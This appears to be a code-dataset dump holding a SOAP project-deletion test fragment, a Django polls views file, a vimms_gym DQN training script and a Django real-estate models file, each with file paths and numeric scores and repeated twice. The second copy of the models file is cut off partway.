app.manage_projects.delete_first_project()
# Получаем обновленный список проектов
parced_new_list = soap_projects_list(app, password, username)
# Убираем из старого списка удалённый проект
parced_old_list.remove(project)
assert sorted(parced_old_list, key=Project.project_id_or_max) == sorted(parced_new_list, key=Project.project_id_or_max)
def soap_projects_list(app, password, username):
# Получаем список проектов
unparsed_list = app.soap.get_projects_list(username, password)
assert unparsed_list
parced_old_list = app.manage_projects.get_projects_list_from_soap(unparsed_list)
assert parced_old_list
return parced_old_list | 0.264928 | 0.358185 |
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views import generic
from .models import Question, Choice
from django.utils import timezone
from .forms import SearchForm
from django.forms.models import modelformset_factory
class IndexView(generic.ListView):
template_name= 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(req, question_id):
p = get_object_or_404(Question, pk=question_id)
try:
selected_choice = p.choice_set.get(pk=req.POST['choice'])
except (KeyError, Choice.DoesNotExist):
return render(req, 'polls/detail.html', {
'question': p,
'error_message': "You didn't select a choice",
})
else:
selected_choice.votes += 1
selected_choice.save()
return HttpResponseRedirect(reverse('polls:results', args=(p.id,)))
def search_form(req):
form = SearchForm()
return render(req, 'polls/search_form.html', {"form": form})
def search(req):
if req.method == 'GET':
if req.GET.get('question_id'):
questions = Question.objects.filter(id=req.GET["question_id"])
elif req.GET.get("question_text"):
questions = Question.objects.filter(question_text__icontains=req.GET["question_text"])
formset = modelformset_factory(Question, form=SearchForm)
form = formset(queryset=questions)
zipped = zip(form, questions)
return render(req, 'polls/search.html', {'questions': questions, 'form': form, 'zipped': zipped})
else:
form = SearchForm()
return HttpResponseRedirect(reverse('polls:index'))
def edit(req, question_id):
q = get_object_or_404(Question,pk=question_id)
if req.method == 'POST':
forms = SearchForm(req.POST, instance=q)
forms.save()
return HttpResponseRedirect(reverse('polls:index'))
else:
form = SearchForm(instance=q)
return render(req, 'polls/edit.html', {'form': form}) | polls/views.py | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views import generic
from .models import Question, Choice
from django.utils import timezone
from .forms import SearchForm
from django.forms.models import modelformset_factory
class IndexView(generic.ListView):
template_name= 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(req, question_id):
p = get_object_or_404(Question, pk=question_id)
try:
selected_choice = p.choice_set.get(pk=req.POST['choice'])
except (KeyError, Choice.DoesNotExist):
return render(req, 'polls/detail.html', {
'question': p,
'error_message': "You didn't select a choice",
})
else:
selected_choice.votes += 1
selected_choice.save()
return HttpResponseRedirect(reverse('polls:results', args=(p.id,)))
def search_form(req):
form = SearchForm()
return render(req, 'polls/search_form.html', {"form": form})
def search(req):
if req.method == 'GET':
if req.GET.get('question_id'):
questions = Question.objects.filter(id=req.GET["question_id"])
elif req.GET.get("question_text"):
questions = Question.objects.filter(question_text__icontains=req.GET["question_text"])
formset = modelformset_factory(Question, form=SearchForm)
form = formset(queryset=questions)
zipped = zip(form, questions)
return render(req, 'polls/search.html', {'questions': questions, 'form': form, 'zipped': zipped})
else:
form = SearchForm()
return HttpResponseRedirect(reverse('polls:index'))
def edit(req, question_id):
q = get_object_or_404(Question,pk=question_id)
if req.method == 'POST':
forms = SearchForm(req.POST, instance=q)
forms.save()
return HttpResponseRedirect(reverse('polls:index'))
else:
form = SearchForm(instance=q)
return render(req, 'polls/edit.html', {'form': form}) | 0.33546 | 0.083217 |
import sys
from os.path import exists
sys.path.append('../..')
import numpy as np
from loguru import logger
from stable_baselines3 import DQN
from stable_baselines3.common.vec_env import DummyVecEnv
from stable_baselines3.common.monitor import Monitor
from vimms.Common import POSITIVE, load_obj, save_obj
from vimms.ChemicalSamplers import MZMLFormulaSampler, MZMLRTandIntensitySampler, \
MZMLChromatogramSampler, GaussianChromatogramSampler
from vimms.Roi import RoiBuilderParams
from vimms_gym.env import DDAEnv
n_chemicals = (2000, 2000)
mz_range = (70, 1000)
rt_range = (0, 1440)
intensity_range = (1E4, 1E20)
min_mz = mz_range[0]
max_mz = mz_range[1]
min_rt = rt_range[0]
max_rt = rt_range[1]
min_log_intensity = np.log(intensity_range[0])
max_log_intensity = np.log(intensity_range[1])
isolation_window = 0.7
N = 10
rt_tol = 120
mz_tol = 10
min_ms1_intensity = 5000
ionisation_mode = POSITIVE
enable_spike_noise = True
noise_density = 0.1
noise_max_val = 1E3
mzml_filename = '../notebooks/fullscan_QCB.mzML'
samplers = None
samplers_pickle = '../notebooks/samplers_fullscan_QCB.mzML.p'
if exists(samplers_pickle):
logger.info('Loaded %s' % samplers_pickle)
samplers = load_obj(samplers_pickle)
mz_sampler = samplers['mz']
ri_sampler = samplers['rt_intensity']
cr_sampler = samplers['chromatogram']
else:
logger.info('Creating samplers from %s' % mzml_filename)
mz_sampler = MZMLFormulaSampler(mzml_filename, min_mz=min_mz, max_mz=max_mz)
ri_sampler = MZMLRTandIntensitySampler(mzml_filename, min_rt=min_rt, max_rt=max_rt,
min_log_intensity=min_log_intensity,
max_log_intensity=max_log_intensity)
roi_params = RoiBuilderParams(min_roi_length=3, at_least_one_point_above=1000)
cr_sampler = MZMLChromatogramSampler(mzml_filename, roi_params=roi_params)
samplers = {
'mz': mz_sampler,
'rt_intensity': ri_sampler,
'chromatogram': cr_sampler
}
save_obj(samplers, samplers_pickle)
params = {
'chemical_creator': {
'mz_range': mz_range,
'rt_range': rt_range,
'intensity_range': intensity_range,
'n_chemicals': n_chemicals,
'mz_sampler': mz_sampler,
'ri_sampler': ri_sampler,
'cr_sampler': GaussianChromatogramSampler(),
},
'noise': {
'enable_spike_noise': enable_spike_noise,
'noise_density': noise_density,
'noise_max_val': noise_max_val,
'mz_range': mz_range
},
'env': {
'ionisation_mode': ionisation_mode,
'rt_range': rt_range,
'isolation_window': isolation_window,
'mz_tol': mz_tol,
'rt_tol': rt_tol,
}
}
max_peaks = 200
env = DDAEnv(max_peaks, params)
env_name = 'DDAEnv'
# modified parameters
learning_rate = 0.0001
batch_size = 512
gamma = 0.90
exploration_fraction = 0.25
exploration_initial_eps = 1.0
exploration_final_eps = 0.10
hidden_nodes = 512
total_timesteps = 2000
net_arch = [hidden_nodes, hidden_nodes]
policy_kwargs = dict(net_arch=net_arch)
env = DDAEnv(max_peaks, params)
env = Monitor(env)
env = DummyVecEnv([lambda: env])
model = DQN('MultiInputPolicy', env,
learning_rate=learning_rate, batch_size=batch_size, gamma=gamma,
exploration_fraction=exploration_fraction,
exploration_initial_eps=exploration_initial_eps,
exploration_final_eps=exploration_final_eps,
policy_kwargs=policy_kwargs, verbose=2)
model.learn(total_timesteps=total_timesteps, log_interval=1) | vimms_gym/debug_training.py | import sys
from os.path import exists
sys.path.append('../..')
import numpy as np
from loguru import logger
from stable_baselines3 import DQN
from stable_baselines3.common.vec_env import DummyVecEnv
from stable_baselines3.common.monitor import Monitor
from vimms.Common import POSITIVE, load_obj, save_obj
from vimms.ChemicalSamplers import MZMLFormulaSampler, MZMLRTandIntensitySampler, \
MZMLChromatogramSampler, GaussianChromatogramSampler
from vimms.Roi import RoiBuilderParams
from vimms_gym.env import DDAEnv
n_chemicals = (2000, 2000)
mz_range = (70, 1000)
rt_range = (0, 1440)
intensity_range = (1E4, 1E20)
min_mz = mz_range[0]
max_mz = mz_range[1]
min_rt = rt_range[0]
max_rt = rt_range[1]
min_log_intensity = np.log(intensity_range[0])
max_log_intensity = np.log(intensity_range[1])
isolation_window = 0.7
N = 10
rt_tol = 120
mz_tol = 10
min_ms1_intensity = 5000
ionisation_mode = POSITIVE
enable_spike_noise = True
noise_density = 0.1
noise_max_val = 1E3
mzml_filename = '../notebooks/fullscan_QCB.mzML'
samplers = None
samplers_pickle = '../notebooks/samplers_fullscan_QCB.mzML.p'
if exists(samplers_pickle):
logger.info('Loaded %s' % samplers_pickle)
samplers = load_obj(samplers_pickle)
mz_sampler = samplers['mz']
ri_sampler = samplers['rt_intensity']
cr_sampler = samplers['chromatogram']
else:
logger.info('Creating samplers from %s' % mzml_filename)
mz_sampler = MZMLFormulaSampler(mzml_filename, min_mz=min_mz, max_mz=max_mz)
ri_sampler = MZMLRTandIntensitySampler(mzml_filename, min_rt=min_rt, max_rt=max_rt,
min_log_intensity=min_log_intensity,
max_log_intensity=max_log_intensity)
roi_params = RoiBuilderParams(min_roi_length=3, at_least_one_point_above=1000)
cr_sampler = MZMLChromatogramSampler(mzml_filename, roi_params=roi_params)
samplers = {
'mz': mz_sampler,
'rt_intensity': ri_sampler,
'chromatogram': cr_sampler
}
save_obj(samplers, samplers_pickle)
params = {
'chemical_creator': {
'mz_range': mz_range,
'rt_range': rt_range,
'intensity_range': intensity_range,
'n_chemicals': n_chemicals,
'mz_sampler': mz_sampler,
'ri_sampler': ri_sampler,
'cr_sampler': GaussianChromatogramSampler(),
},
'noise': {
'enable_spike_noise': enable_spike_noise,
'noise_density': noise_density,
'noise_max_val': noise_max_val,
'mz_range': mz_range
},
'env': {
'ionisation_mode': ionisation_mode,
'rt_range': rt_range,
'isolation_window': isolation_window,
'mz_tol': mz_tol,
'rt_tol': rt_tol,
}
}
max_peaks = 200
env = DDAEnv(max_peaks, params)
env_name = 'DDAEnv'
# modified parameters
learning_rate = 0.0001
batch_size = 512
gamma = 0.90
exploration_fraction = 0.25
exploration_initial_eps = 1.0
exploration_final_eps = 0.10
hidden_nodes = 512
total_timesteps = 2000
net_arch = [hidden_nodes, hidden_nodes]
policy_kwargs = dict(net_arch=net_arch)
env = DDAEnv(max_peaks, params)
env = Monitor(env)
env = DummyVecEnv([lambda: env])
model = DQN('MultiInputPolicy', env,
learning_rate=learning_rate, batch_size=batch_size, gamma=gamma,
exploration_fraction=exploration_fraction,
exploration_initial_eps=exploration_initial_eps,
exploration_final_eps=exploration_final_eps,
policy_kwargs=policy_kwargs, verbose=2)
model.learn(total_timesteps=total_timesteps, log_interval=1) | 0.311113 | 0.234177 |
from __future__ import absolute_import
# development system imports
import os
import random
import uuid
from datetime import date, datetime, timedelta
from decimal import Decimal
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.contrib.humanize.templatetags import humanize
from django.core.exceptions import ValidationError
from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator
from django.db.models import (
CASCADE,
SET_NULL,
BooleanField,
CharField,
DateField,
DateTimeField,
DecimalField,
EmailField,
FileField,
ForeignKey,
GenericIPAddressField,
ImageField,
IntegerField,
ManyToManyField,
OneToOneField,
PositiveIntegerField,
SlugField,
TextChoices,
TextField,
URLField,
UUIDField,
)
from django.db.models.fields import FloatField
from django.template.loader import get_template, render_to_string
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from django_resized import ResizedImageField
from model_utils import Choices
from model_utils.fields import StatusField
from model_utils.models import TimeStampedModel
from tinymce.models import HTMLField
User = settings.AUTH_USER_MODEL
phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
char_regex = RegexValidator(regex=r'^[A-Za-z]*$', message="Field must be only alphabets: A-Z or a-z")
def get_filename_ext(filepath):
base_name = os.path.basename(filepath)
name, ext = os.path.splitext(base_name)
return name, ext
def property_images(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-photo/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
def blueprint_image(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-blueprint/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
def property_video(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-video/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
# Create your models here.
class City(TimeStampedModel):
title = CharField(max_length=30, null=True, blank=True, unique=True)
def __str__(self):
return f"{self.title}"
class Meta:
managed = True
verbose_name = "City"
verbose_name_plural = "Cities"
ordering = ["title"]
class State(TimeStampedModel):
title = CharField(max_length=30, null=True, blank=True, unique=True)
def __str__(self):
return f"{self.title}"
class Meta:
managed = True
verbose_name = "State"
verbose_name_plural = "States"
ordering = ["title"]
class PropertyFeature(TimeStampedModel):
AC = "Air Conditioning"
POOL = "Swimming Pool"
HEAT = "Central Heating"
LAUNDRY = "Laundry Room"
GYM = "Gym"
ALARM = "Alarm"
INTERNET = "Internet"
GARAGE = "Garage"
GARDEN = "Garden"
PARKING = "Parking Lot"
EXERCISE = "Exercise Room"
COOLING = "Central Cooling"
STORAGE = "Srorage Room"
WATER = "Treated Water"
PROPERTY_FEATURES = (
(AC, "Air Conditioning"),
(POOL, "Swimming Pool"),
(HEAT, "Central Heating"),
(LAUNDRY, "Laundry Room"),
(PARKING, "Parking Lot"),
(EXERCISE, "Exercise Room"),
(COOLING, "Central Cooling"),
(STORAGE, "Srorage Room"),
(WATER, "Treated Water"),
(INTERNET, "Internet"),
(GARAGE, "Attached Garage"),
(GARDEN, "Garden"),
(GYM, "Gym"),
(ALARM, "Alarm"),
)
property_features = CharField(_("Property Features (Optional)"), max_length=17, choices=PROPERTY_FEATURES, default=POOL, null=True, blank=True, unique=True)
def __str__(self):
return str(self.property_features)
class Meta:
managed = True
verbose_name = "Property Feature"
verbose_name_plural = "Property Features"
ordering = ["property_features"]
class Property(TimeStampedModel):
SOLD = "Sold"
BUY = "Buy"
RENT = "Rent"
DEVELOP = "Develop"
SHORTLET = "Shortlet"
PROPERTY_STATUS = (
(SOLD, "Sold"),
(BUY, "Buy"),
(RENT, "Rent"),
(DEVELOP, "Develop"),
(SHORTLET, "Shortlet"),
)
APARTMENT = "Apartment"
HOUSE = "House"
COMMERCIAL = "Commercial"
GARAGE = "Garage"
GARDEN = "Garden"
LOT = "Lot"
PLOT = "Plot"
PROPERTY_TYPE = (
(APARTMENT, "Apartment"),
(HOUSE, "House"),
(COMMERCIAL, "Commercial"),
(GARAGE, "Garage"),
(GARDEN, "Garden"),
(LOT, "Lot"),
(PLOT, "Plot"),
)
ONE = 1
TWO = 2
THREE = 3
FOUR = 4
FIVE = 5
SIX = 00
ROOMS = (
(ONE, "1 Room"),
(TWO, "2 Rooms"),
(THREE, "3 Rooms"),
(FOUR, "4 Rooms"),
(FIVE, "5 Rooms"),
(SIX, "More than 5 Rooms"),
)
ANNUAL = "Annually"
MONTHLY = "Monthly"
SQFT = "Sq/Ft"
PRICE_TYPE = (
(ANNUAL , "Annually"),
(MONTHLY , "Monthly"),
(SQFT , "Sq/Ft"),
)
ZEROONE = "0 - 1"
ZEROFIVE = "0 - 5"
ZEROTEN = "0 - 10"
ZEROTWENTY = "0 - 20"
ZEROFIFTY = "0 - 50"
FITYPLUS = "50 - more"
PROPERTY_AGE = (
(ZEROONE, "0 - 1"),
(ZEROFIVE, "0 - 5"),
(ZEROTEN, "0 - 10"),
(ZEROTWENTY, "0 - 20"),
(ZEROFIFTY, "0 - 50"),
(FITYPLUS, "50 - more"),
)
property_agent = ForeignKey(User, on_delete=CASCADE, related_name="agentproperty")
property_title = CharField(_("Property Title"), null=True, blank=False, max_length=500)
slug = SlugField(max_length=700, blank=True, null=True, unique=True)
property_status = CharField(_("Property Status"), max_length=8, choices=PROPERTY_STATUS, default=RENT, null=True, blank=True)
property_type = CharField(_("Property Type"), max_length=15, choices=PROPERTY_TYPE, default=APARTMENT, null=True, blank=True)
property_price_type = CharField(_("Property Price Type"), max_length=15, choices=PRICE_TYPE, default=ANNUAL, null=True, blank=False)
property_price = DecimalField(_("Property Price (for 1 year or 1 sq/ft)"), max_digits=20, decimal_places=2, default=0.00, blank=False, help_text="if your price type is sq/ft, then the price cost should be by a unit of the property area square feet and leave the total we will automatically round it up for you by the total area numbers you have ")
property_area = DecimalField(_("Per Sq/Ft"), max_digits=20, decimal_places=2, default=0.00, blank=True)
property_area_number = IntegerField(_("How many sq/ft do you have of the above property per sq/ft? i.e (5 Per Sq/Ft x 10 = 50 Total Square Feet) leave it empty for rented properties"), default=1, null=True, blank=True, help_text="From 1-1000. to calculate to total price for square feets")
property_bathrooms = IntegerField(_("Bath Rooms"), choices=ROOMS, default=ONE, null=True, blank=False)
property_bedrooms = IntegerField(_("Bed Rooms"), choices=ROOMS, default=ONE, null=True, blank=False)
property_parlors = IntegerField(_("Parlors"), choices=ROOMS, default=ONE, null=True, blank=False)
property_latitude = FloatField(_("Map Latitude"), null=True, default=0.000000000, validators=[MinValueValidator(-90.000000000), MaxValueValidator(90.000000000)], help_text="You can find this on google maps by inputing the actual property address and right clicking on the location pointer to reveal the latitude")
property_longitude = FloatField(_("Map Longitude"), null=True, default=0.000000000, validators=[MinValueValidator(-180.000000000), MaxValueValidator(180.000000000)], help_text="You can find this on google maps by inputing the actual property address and right clicking on the location pointer to reveal the longitude")
property_location = CharField(_("Property Street Address"), max_length=500, null=True, blank=False, help_text="eg. 123 Close, Street !!! PS: Do not attach a state or country when listing this property !!!")
property_near_location = CharField(_("Property Closest building street address"), max_length=500, null=True, blank=False, help_text="eg. 123 Close, Street !!! PS: Do not attach a state or country when listing this property !!!")
property_city = ForeignKey("City", on_delete=SET_NULL, null=True, related_name="propertycity")
property_state = ForeignKey("State", on_delete=SET_NULL, null=True, related_name="propertystate")
property_detail = HTMLField()
property_age = CharField(_("Building Age (Optional)"), max_length=50, null=True, choices=PROPERTY_AGE, default=ZEROFIVE, blank=True)
property_features = ManyToManyField("PropertyFeature", help_text="Select all features that apply for the house")
property_expire = IntegerField(_("How long is the renting or buying supposed to last, 1 year or more?"), default=0*455, null=True, blank=True, help_text="use 100 if it a land that is being purchased. and any figure when it is a rentage. NOTE: An additional 2 months is given to a property before it is reactivated as availble for purchase after its last purchased date")
property_sold = BooleanField(default=False)
approved = BooleanField(default=False)
featured = BooleanField(default=False)
def total_area(self):
if self.property_area and self.property_area_number:
return self.property_area * Decimal(self.property_area_number)
def sqft_total(self):
if self.property_price and self.property_area_number:
return self.property_price * Decimal(self.property_area_number)
def last_purchased_date(self):
if self.property_sold:
return datetime.date.today()
def next_expiry_date(self):
if self.last_purchased_date and self.property_expire > 0 and self.property_expire < 100:
return self.last_purchased_date + timedelta(days=self.property_expire)
def now_availble(self):
today = datetime.date.today()
if today > self.next_expiry_date and self.property_sold:
self.property_sold = False
self.property_sold.save()
return True
return False
def formated_address(self):
return self.property_location.replace(" ", "+")
def formated_state(self):
return self.property_state.title.replace(" ", "+")
def formated_closest_address(self):
return self.property_near_location.replace(" ", "+")
def __str__(self):
return str(self.property_title)
def title(self):
return self.property_title
def get_related_property(self):
return Property.objects.filter(property_agent=self.property_agent, property_type=self.property_type, property_state=self.property_state, approved=True).exclude(property_title=self.property_title)[:4]
def get_featured_property(self):
return Property.objects.filter(property_agent=self.property_agent, property_type=self.property_type, property_state=self.property_state, approved=True, featured=True).exclude(property_title=self.property_title)[:4]
def get_related_property_by_agent(self):
return Property.objects.filter(property_agent=self.property_agent)[:10]
def get_related_property_by_state(self):
return Property.objects.filter(property_state=self.property_state)[:10]
@property
def get_image_url(self):
img = self.propertyimage.first()
if img:
return img.image.url
return None
def get_all_images(self):
return self.propertyimage.all()
def get_all_floors(self):
return self.propertyplan.all()
def get_video_url(self):
img = self.propertyvideo.first()
if img:
return img.video.url
return None
class Meta:
managed = True
verbose_name = "Property"
verbose_name_plural = "Properties"
ordering = ["-created", "property_title"]
def get_absolute_url(self):
"""Get url for blog's detail view.
Returns:
str: URL for blog detail.
"""
return reverse("property:detail", kwargs={"slug": self.slug})
def get_update_url(self):
return f"{self.get_absolute_url}/update"
def get_delete_url(self):
return f"{self.get_absolute_url}/delete"
class PropertyImage(TimeStampedModel):
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyimage")
image = ResizedImageField(size=[520, 397], quality=80, crop=['middle', 'center'], upload_to=property_images, force_format='JPEG', null=True, blank=True, help_text="image size: 520x397.")
def __str__(self):
return f"{self.property.property_title} Image"
class PropertyBlueprint(TimeStampedModel):
GROUND = "Ground Floor"
FIRST = "First Floor"
SECOND = "Second Floor"
THIRD = "Third Floor"
FOURTH = "Fourth Floor"
ALL = "All Floor Type"
PENTHOUSE = "Penthouse"
GARAGE = "Garage"
POOL_HOUSE = "Pool House"
BLUEPRINT = (
(GROUND, "Ground Floor"),
(FIRST, "First Floor"),
(SECOND, "Second Floor"),
(THIRD, "Third Floor"),
(FOURTH, "Fourth Floor"),
(ALL, "All Floor Type"),
(PENTHOUSE, "Penthouse"),
(GARAGE, "Garage"),
(POOL_HOUSE, "Pool House"),
)
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyplan")
type = CharField(_("Blueprint"), null=True, blank=False, max_length=50, choices=BLUEPRINT, default=FIRST)
image = ResizedImageField(size=[1000, 576], quality=70, crop=['middle', 'center'], upload_to=blueprint_image, force_format='JPEG', null=True, blank=True, help_text="image size: 1000x576.")
floor_area = DecimalField(_("Area Sq/Ft"), max_digits=20, decimal_places=2, default=0.00, blank=False)
floor_detail = HTMLField()
def __str__(self):
return f"{self.property.property_title} {self.type} Blueprint"
class PropertyVideo(TimeStampedModel):
property = ForeignKey("Property", on_delete=CASCADE, related_name="propertyvideo")
video = FileField(upload_to=property_video, null=True, blank=True, help_text="Your video should be 40Seconds Long, 20MB in size max")
def __str__(self):
return f"{self.property.property_title} New Video"
class PropertyCompare(TimeStampedModel):
property = ForeignKey(Property, on_delete=SET_NULL, null=True, default=1, related_name="compareproperty")
class Meta:
managed = True
verbose_name = "Property Compare"
verbose_name_plural = "Properties Compared"
ordering = ["-created"]
class PropertyBookmark(TimeStampedModel):
user = ForeignKey(User, on_delete=CASCADE, related_name="bookmarkuser")
property = ForeignKey(Property, on_delete=SET_NULL, null=True, related_name="bookmarkproperty")
active = BooleanField(default=False)
def __str__(self):
return f"{self.user.fullname} Bookmarked {self.property.property_title}"
def deleted_property(self):
obj = Property.objects.filter(approved=True, property_sold=False, property_title=self.property.property_title).exits()
if not obj:
PropertyBookmark.objects.filter(property=self.property, user=self.user).delete()
return True
return False
def sold_property(self):
obj = Property.objects.filter(approved=True, property_sold=True, property_title=self.property.property_title).exits()
if obj:
PropertyBookmark.objects.filter(property=self.property, user=self.user, active=True).update(active=False)
return True
return False
class Meta:
managed = True
verbose_name = "Property Bookmark"
verbose_name_plural = "Properties Bookmarked"
ordering = ["-created"]
class PropertySearchSaved(TimeStampedModel):
user = ForeignKey(User, on_delete=CASCADE, related_name="searchuser")
search_link = URLField(blank=True, null=True)
saved = BooleanField(default=False)
def __str__(self):
return f"{self.user.fullname} saved {self.search_link}"
class Meta:
managed = True
verbose_name = "Property Search Query"
verbose_name_plural = "Properties Search Query"
ordering = ["-created"] | afriproperty/property/models.py | from __future__ import absolute_import
# development system imports
import os
import random
import uuid
from datetime import date, datetime, timedelta
from decimal import Decimal
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.contrib.humanize.templatetags import humanize
from django.core.exceptions import ValidationError
from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator
from django.db.models import (
CASCADE,
SET_NULL,
BooleanField,
CharField,
DateField,
DateTimeField,
DecimalField,
EmailField,
FileField,
ForeignKey,
GenericIPAddressField,
ImageField,
IntegerField,
ManyToManyField,
OneToOneField,
PositiveIntegerField,
SlugField,
TextChoices,
TextField,
URLField,
UUIDField,
)
from django.db.models.fields import FloatField
from django.template.loader import get_template, render_to_string
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from django_resized import ResizedImageField
from model_utils import Choices
from model_utils.fields import StatusField
from model_utils.models import TimeStampedModel
from tinymce.models import HTMLField
User = settings.AUTH_USER_MODEL
phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
char_regex = RegexValidator(regex=r'^[A-Za-z]*$', message="Field must be only alphabets: A-Z or a-z")
def get_filename_ext(filepath):
base_name = os.path.basename(filepath)
name, ext = os.path.splitext(base_name)
return name, ext
def property_images(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-photo/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
def blueprint_image(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-blueprint/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
def property_video(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-video/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
# Create your models here.
class City(TimeStampedModel):
title = CharField(max_length=30, null=True, blank=True, unique=True)
def __str__(self):
return f"{self.title}"
class Meta:
managed = True
verbose_name = "City"
verbose_name_plural = "Cities"
ordering = ["title"]
class State(TimeStampedModel):
title = CharField(max_length=30, null=True, blank=True, unique=True)
def __str__(self):
return f"{self.title}"
class Meta:
managed = True
verbose_name = "State"
verbose_name_plural = "States"
ordering = ["title"]
class PropertyFeature(TimeStampedModel):
AC = "Air Conditioning"
POOL = "Swimming Pool"
HEAT = "Central Heating"
LAUNDRY = "Laundry Room"
GYM = "Gym"
ALARM = "Alarm"
INTERNET = "Internet"
GARAGE = "Garage"
GARDEN = "Garden"
PARKING = "Parking Lot"
EXERCISE = "Exercise Room"
COOLING = "Central Cooling"
STORAGE = "Srorage Room"
WATER = "Treated Water"
PROPERTY_FEATURES = (
(AC, "Air Conditioning"),
(POOL, "Swimming Pool"),
(HEAT, "Central Heating"),
(LAUNDRY, "Laundry Room"),
(PARKING, "Parking Lot"),
(EXERCISE, "Exercise Room"),
(COOLING, "Central Cooling"),
(STORAGE, "Srorage Room"),
(WATER, "Treated Water"),
(INTERNET, "Internet"),
(GARAGE, "Attached Garage"),
(GARDEN, "Garden"),
(GYM, "Gym"),
(ALARM, "Alarm"),
)
property_features = CharField(_("Property Features (Optional)"), max_length=17, choices=PROPERTY_FEATURES, default=POOL, null=True, blank=True, unique=True)
def __str__(self):
return str(self.property_features)
class Meta:
managed = True
verbose_name = "Property Feature"
verbose_name_plural = "Property Features"
ordering = ["property_features"]
class Property(TimeStampedModel):
SOLD = "Sold"
BUY = "Buy"
RENT = "Rent"
DEVELOP = "Develop"
SHORTLET = "Shortlet"
PROPERTY_STATUS = (
(SOLD, "Sold"),
(BUY, "Buy"),
(RENT, "Rent"),
(DEVELOP, "Develop"),
(SHORTLET, "Shortlet"),
)
APARTMENT = "Apartment"
HOUSE = "House"
COMMERCIAL = "Commercial"
GARAGE = "Garage"
GARDEN = "Garden"
LOT = "Lot"
PLOT = "Plot"
PROPERTY_TYPE = (
(APARTMENT, "Apartment"),
(HOUSE, "House"),
(COMMERCIAL, "Commercial"),
(GARAGE, "Garage"),
(GARDEN, "Garden"),
(LOT, "Lot"),
(PLOT, "Plot"),
)
ONE = 1
TWO = 2
THREE = 3
FOUR = 4
FIVE = 5
SIX = 00
ROOMS = (
(ONE, "1 Room"),
(TWO, "2 Rooms"),
(THREE, "3 Rooms"),
(FOUR, "4 Rooms"),
(FIVE, "5 Rooms"),
(SIX, "More than 5 Rooms"),
)
ANNUAL = "Annually"
MONTHLY = "Monthly"
SQFT = "Sq/Ft"
PRICE_TYPE = (
(ANNUAL , "Annually"),
(MONTHLY , "Monthly"),
(SQFT , "Sq/Ft"),
)
ZEROONE = "0 - 1"
ZEROFIVE = "0 - 5"
ZEROTEN = "0 - 10"
ZEROTWENTY = "0 - 20"
ZEROFIFTY = "0 - 50"
FITYPLUS = "50 - more"
PROPERTY_AGE = (
(ZEROONE, "0 - 1"),
(ZEROFIVE, "0 - 5"),
(ZEROTEN, "0 - 10"),
(ZEROTWENTY, "0 - 20"),
(ZEROFIFTY, "0 - 50"),
(FITYPLUS, "50 - more"),
)
property_agent = ForeignKey(User, on_delete=CASCADE, related_name="agentproperty")
property_title = CharField(_("Property Title"), null=True, blank=False, max_length=500)
slug = SlugField(max_length=700, blank=True, null=True, unique=True)
property_status = CharField(_("Property Status"), max_length=8, choices=PROPERTY_STATUS, default=RENT, null=True, blank=True)
property_type = CharField(_("Property Type"), max_length=15, choices=PROPERTY_TYPE, default=APARTMENT, null=True, blank=True)
property_price_type = CharField(_("Property Price Type"), max_length=15, choices=PRICE_TYPE, default=ANNUAL, null=True, blank=False)
property_price = DecimalField(_("Property Price (for 1 year or 1 sq/ft)"), max_digits=20, decimal_places=2, default=0.00, blank=False, help_text="if your price type is sq/ft, then the price cost should be by a unit of the property area square feet and leave the total we will automatically round it up for you by the total area numbers you have ")
property_area = DecimalField(_("Per Sq/Ft"), max_digits=20, decimal_places=2, default=0.00, blank=True)
